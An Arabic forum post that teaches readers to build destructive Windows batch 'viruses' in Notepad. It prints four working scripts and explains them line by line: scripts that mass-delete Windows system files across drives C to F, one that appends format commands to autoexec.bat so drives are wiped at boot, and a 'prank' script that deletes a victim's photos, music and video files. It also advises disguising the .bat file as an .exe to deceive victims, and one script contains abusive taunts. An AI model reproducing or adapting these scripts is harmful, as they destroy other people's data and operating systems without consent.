شرح عمل فايروس

السلام عليكم ورحمة الله وبركاته

حبيت اقولكم انه مثل هذه الاشياء تصميمها سهل فوق ما يتم التصور وأنا كنت من الناس
اللي يشوفوا أن تصميم فيروس من راسك شيء مستحيل ولم أتصور بأنها
تافه وتصنع بكل سهوله.

أولاً: أنا حبيت أعرف كل شيء عن الفيروسات وبحثت في النت عن كيفية صناعتها
فتوصلت إلى أمور أفادتني كثيراً وقد جمعت صفحات كثيرة من منتديات مختلفة
ودرست أوامر الفيروسات واستفدت الكثير وها أنا أنقل لكم ما درست من تلك
الصفحات بالإضافة إلى بعض الإضافات من عندي .

بسم الله نبدأ :

× الفيروسات نوعان هي :

1- ما يصنع عن طريق برامج / وهي أقوى الفيروسات وأضرارها فادحة ولكن معظمها
مكتشف من قبل برامج الانتي فيروس.

2- ما يصنع عن طريق المفكرة notepad / وهي تعتبر أضعف من السابق وأضرارها
محدودة على حسب الكود المصنع ولكن معظمها غير مكتشفه من قبل برامج الانتي فيروس.

* نقاط هامة :
1- إن أهم شيء في صناعة الفيروس هو كود الفيروس وهذه هي الفكرة كيف تصنع كود فيروس
دون الاستعانه بشيء لا برامج ولا تنسخ أي كود يعني تجيب الكود من راسك أنت.

2- الكل يعرف بعد إنشاء كود الفيروس عليك أن تحفظه بإمتداد bat وإذا أردت
تغيره إلى exe أو com فيلزمك برامج لتغيرإمتداده وخداع الضحية.

3- اللي ما يعرف الطريقة لا يجربها على جهازه وأنا بريء من أي دمار يحدث لجهازك .

4- أول ما تنسخ الأكواد اللي في الأسفل في المفكرة وتحفظها بإمتداد bat فأنت قد صنعت فيروس
وإحذر من فتحه.

5- راح أبدأ الشرح على أكواد فيروسات صنعت بالمفكرة وأحدثت دمار قوي جداً وهي منقولة طبعاً.

6- ملخص عن أوامر الفيروسات (( مهم جداً )) :

* (( del ، deltree )) : أمر مسح : وهو أمر مهم ويكاد لا يخلو فيروس إلا وهذا الأمر فيه.
* (( *.exe )) : هذا الأمر يقوم بتحديد الملفات التي إمتدادها exe مهما كان إسمها.
* (( *.* )) : ويعتبر أقوى أوامر الفيروس على الاطلاق وهو قوي جداً وسيأتي شرحه.
* (( @echo off )) : وهذا الأمر يعطى في الفيروس لتنفيذ ما تحت هذا الأمر من أوامر بأسرع صورة ممكنة على شاشة الدوس.
* (( cls )) : لمسح الأوامر السابقة اللي نفذها الفيروس وبداية تنفيذ أوامر أخرى وهذا يعطى إذا كان الكود طويل ليتم تنفيذ الأمر التالي بصورة سريعة.

# وهذي أهم أوامر الفيروس وسنتعرف على أوامر أخرى في الأسفل لا تقول مو فاهم لا تابع
الشرح وأنا متأكد إنك راح تصنع فيروس خاص يسجل بإسمك.

بسم الله نبدأ شرح الأكواد :

الكود الأول
================================================== ==========
del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
================================================== ==========
واضح أن من صنع هذا الفيروس هو مبتدئ
لاحظ الأوامر اللي كتبها صاحب الكود وهي كالتالي :
أول شيء أعطى الأمر مسح .
ثاني شيء حدد مسار الملف اللي موجودة فيه الملفات المراد مسحها وهو ملف الويندوز C:windows
ثالث شيء حدد مسار الملفات المراد مسحها دون تحديد إسمها.

اول شي قدمه امر
del ( لمسح الملفات )

ثاني شي حدد المكان الموجوده فيه الملفات
C:windows
C:windowssystem32
C:windowssystem
هذه اهي الاماكن الموجوده فيها الملفات

ثالث شي قدمه نوع المسارات الي يجب ان تنمسح .

* إذاً الفيروس = مسح + تحديد مسار الملف الموجودة فيه الملفات المراد مسحها + تحديد الملفات المراد مسحها .

توضيح :
الأمر الأول أعتقد واضح والأمر الثاني برضه واضح والثالث إليك توضيحة :

(( A.ini ))

لو وضع هذا الأمر لقام الفيروس بمسح الملفات اللي إسمها A وإمتدادها ini
مثلاً فيه ملفات إسمها B وإمتدادها ini وهي (( B.ini )) فإن الفيروس لن يمسحها لأن الاسم
قد إختلف وكذلك إذا إختلف الإمتداد فلن يمسح الفيروس إلا الاسم والامتداد المحددين له
لذا فإن هذا الأمر ضعيف جداً.

(( *.ini ))

وهذا ما استخدمه صاحب الكود السابق وهو مسح جميع الملفات اللي إمتدادها ini
مهما كان إسمها إذاً هذه العلامة (( * )) تعني جميع الملفات الموجودة وهذا الأمر يعتبر متوسط القوة
لانه قد حدد المسار.

(( *.* ))

وهذا الأمر هو الأقوى على الاطلاق لانه أعطى أمر بمسح جميع الملفات الموجودة في الملف
المحدد مهما كان إسمها ومهما كان إمتدادها.

# إذاً بإمكاننا أن نغير الكود ونجلعه مختصر وأقوى من السابق وإليك التعديل :
================================================== ==========
del C:windows *.*
del C:windowssystem32 *.*
del C:windowssystem *.*
================================================== ==========
شوف التعديل الحين صار الفيروس مختصر وأقوى من السابق
ولاحظ أننا مسحنا هذه الأوامر كلها :
*.ini
*.exe
*.scr
*.txt
*.log
*.nls
*.drf
*.reg
*.sys
*.dll

وإستبدلناها بأمر واحد فقط هو (( *.* )).

فيه عيب ثاني في هذا الفيروس هو :
لو كان ملف الويندوز في الـD إذاً الفيروس عديم الفائدة ولا ضرر منه.
وبشرح الكود الثاني راح تفهم الكلام هذا.

انتهى شرح الكود الأول

الكود الثاني وهو كود فيروس القاتل وعمل الفيروس هو مسح الويندوز بالكامل :
================================================== ==========
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
Cls
del *.exe
del *.scr
del *.ini
del *.txt
del *.dll
del *.dat
del *.sys
del *.bmp
del *.gif
del *.jpg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd system
Cls
del *.manifest
del taskmgr.exe
del *.dll
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
Cls
del *.wsc
del *.oca
del *.msc
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
del *.acm
del *.dat
del *.HLP
Cls
del *.sve
del *.tha
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
cd ..
@del *.dll
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
Cls
del *.manifest
del taskmgr.exe
del *.dll
Cls
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
Cls
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
Cls
del *.acm
del *.dat
del *.HLP
del *.sve
del *.tha
Cls
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
Cls
cd ..
@del *.dll
@echo off
echo **** u( >>010<&lt
echo he kille u pc donot trea
echo if the virs he did not find the system file
echo u **** he will find hem now
@del C:windows*.ini
Cls
@del C:windows*.exe
Cls
@del C:windows*.com
Cls
@del C:windowssystem32*.exe
Cls
@del C:windowssystem32*.sys
Cls
@del C:windowssystem32*.log
Cls
@del C:windowssystem32*.drf
Cls
@del C:windowssystem32*.scr
Cls
@del C:windowssystem32*.dll
Cls
@del C:windowssystem32*.ini
Cls
@del c:windowssystem*.exe
Cls
@del c:windowssystem*.sys
Cls
@del c:windowssystem*.log
Cls
@del c:windowssystem*.drf
Cls
@del c:windowssystem*.scr
Cls
@del c:windowssystem*.dll
Cls
@echo off
echo **** u( >>010<&lt
@del d:windows*.ini
Cls
@del d:windows*.exe
Cls
@del d:windows*.com
Cls
@del d:windowssystem32*.exe
Cls
@del d:windowssystem32*.sys
Cls
@del d:windowssystem32*.log
Cls
@del d:windowssystem32*.drf
Cls
@del d:windowssystem32*.scr
Cls
@del d:windowssystem32*.dll
Cls
@del d:windowssystem32*.ini
Cls
@del d:windowssystem*.exe
Cls
@del d:windowssystem*.sys
Cls
@del d:windowssystem*.log
Cls
@del d:windowssystem*.drf
Cls
@del d:windowssystem*.scr
Cls
@del d:windowssystem*.dll
Cls
@echo off
echo **** u ( >>010<&lt
@del e:windows*.ini
Cls
@del e:windows*.exe
Cls
@del e:windows*.com
Cls
@del e:windowssystem32*.exe
Cls
@del e:windowssystem32*.sys
Cls
@del e:windowssystem32*.log
Cls
@del e:windowssystem32*.drf
Cls
@del e:windowssystem32*.scr
Cls
@del e:windowssystem32*.dll
Cls
@del e:windowssystem32*.ini
Cls
@del e:windowssystem*.exe
Cls
@del e:windowssystem*.sys
Cls
@del e:windowssystem*.log
Cls
@del e:windowssystem*.drf
Cls
@del e:windowssystem*.scr
Cls
@del e:windowssystem*.dll
@echo off
echo **** u ( >>010<&lt
@del f:windows*.ini
Cls
@del f:windows*.exe
Cls
@del f:windows*.com
Cls
@del f:windowssystem32*.exe
Cls
@del f:windowssystem32*.sys
Cls
@del f:windowssystem32*.log
Cls
@del f:windowssystem32*.drf
Cls
@del f:windowssystem32*.scr
Cls
@del f:windowssystem32*.dll
Cls
@del f:windowssystem*.exe
Cls
@del f:windowssystem*.sys
Cls
@del f:windowssystem*.log
Cls
@del f:windowssystem*.drf
Cls
@del f:windowssystem*.scr
Cls
@del f:windowssystem*.dll
@pause
@echo off
echo **** u( >>010<&lt
echo [killer virs_v1] By DosMan [Q8_KOL@HOTMAIL.COM]
echo if u found u pc has been **** in theis virs u shoud now ther
echo are one man he can do that DosMan if u want virs ****er pc
echo like thet Die you mother ****ers
echo ha ha ha ha [Q8_KOL@HOTMAIL.COM]
@pause
:exit
================================================== =============
لاحظ أول أمر اللي هو :
cd ..
وهذا الأمر مهم وهو من جعل من الفيروس الأول فيروس ضعيف
وظيفة الأمر هو امر الرجوع للمفات للوراء .
أي سيبحث الفيروس عن مسار الملف المحدد له إلى أن يجده
بمعنى أنه لو كان الويندوز في :
c: او d:او f:او e:
راح يصيده الفيروس يعني راح يصيده أما لو كان الأمر كما في الفيروس الأول وهو البحث
في الـ C فقط فإن الفيروس لن يصيد الويندوز إلا إذا كان الويندوز في الـ C فقط .

الأوامر :
cd WINDOWS
او
cd system32
او
cd system

هذه الملفات المحددة المطلوب من الفيروس الوصول إليها
والأمر cd الموجود أمام كل مجلد هو أمر للرجوع للوراء كما وضحنا سابقاً
أي أن الفيروس سيبحث أولاً في القرص C إلى أن يجد الملف المحدد له
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص D
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص E
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص F
سيبحث الفيروس عن الملف إلى أن يصيده وهذا أمر قوي في هذا الفيروس

الأمر :
Cls
وهو أمر لمسح شاشة الدوس وجعلها نظيفة لتهئتها لأوامر قادمة
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه

الأوامر :
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس

يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف
وكما قلنا الأمر *.* هو الأقوى مثلاً :
del *.*
لأغنانى هذا الأمر
عن السابق

الأمر :
@echo off
أمر يستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس بأسرع صورة ممكنه حتى لا يشعر بها الضحية.

الأمر :
echo
اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس لينفذ بسرعة عالية.

بعدين مثل ما اتشوفون تم تحديد مسارات الملفات بذكر اسم المحرك c: // d: // e: // f: //

والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد الملفات
يعني اذا قدمتو الفايرس بملف ون زب وكان وندزه غير موجود على السي راح يفلت من الفايرس ولهذا
السبب تم تحديد المسارات مع وضع امر المسح الكلي للمسارات دون اسم الملف

بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير الجهاز ولاكن اذا تم تشغيل الفايرس بالسي ووندزه غير
موجود بالسي ما راح يصيد الملفات
بس الحين بعد التعديل راح يصيدها يعني شي اكييد الجهاز ما يتصلح إلا إذا تفرمت.

انتهى شرح الكود الثاني

الكود الثالث :
================================================== =========
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
================================================== =========
الشرح
echo format c: /q /u /autotest >nul >>c:autoexec.bat

الأمر:
echo
وظيفته : من اجل الكتابه بأسرع ما يمكن.

ظهر لدينا أمر جديد وهو هذا الأمر :
format c: /q /u /
وظيفته : وهذا الأمر من اسمه معروف وهو لعمل فورمات

الأمر:
اسم حق الامر من اجل وضعه بملف autotest

أيضاً أمر جديد وهو الأمر :
nul
وظيفته : عملية مضاعفه لامر الفورمات من اجل جعل الامر مرتين بدل مره واحده .

c:autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه

وتم اختيار اسم autoexec

من اجل ان يعمل الفايرس من تلقاء نفسه

واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat

وفتح الملف سوف تجد ملفات باسم

autoexec موجود في c:

لان تم تحديد مكان الحفظ في السي

وستكون الاوامر بهذا الشكل

format c: /q /u /autotest
format c: /q /u /autotest

وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul

ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في السي

ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره .

ومثل ما ترون الفيروس عبارة عن سطر
والأسطر الباقية نفس السطر اللهم غير إسم القرص فقط
لتتم العملية بنجاح.

انتهى شرح الكود الثالث

الكود الرابع :
================================================== =====
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
cd\
deltree /y *.ini
cd\
deltree /y *.exe
cd\
deltree /y *.txt
cd\
deltree /y *.bat
================================================== =====

الأمر :
@Echo off
تم شرحه وهو للكتابة بصورة سريعة .

الأمر :
cd %WinDir%\System\
تم شرحه وهو لتحديد مسار الملف المراد الوصول إليه.

الأمر :
cd
تم شرحه وهو للرجوع للوراء.

الأمر :
deltree
تم شرحه وهو أمر للمسح أو الحذف .

الأمر:
/y
وهذا الأمر جديد وإليك شرحه
هذا الأمر يستخدم لتنفيذ الأوامر دون الموافقة عليها.
وأنا أعتقد أنه لا يأتي إلا مع الأمر deltree
فإذا سويت del /y *.sys فإن الفيروس لن يعمل
إذاً لا يعمل إلا مع الأمر deltree هذا من استنتاجي
وأنا لست متأكداً لاني أجريت تجارب ولم تنجح والله أعلم .

الأوامر :
*.dll
*.sys
*.ini
*.exe
*.txt
*.bat
تم شرحها وهي الملفات المراد مسحها أو حذفها.

انتهى شرح الكود الرابع

* تجارب :
انا الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحذير فيمكننى ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى:

=============================================
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
=============================================
هذا للتجربة .

وأخيراً أتمنى أنكم إستفدتم

وتقبلوا تحيــــــــــــــــاتي /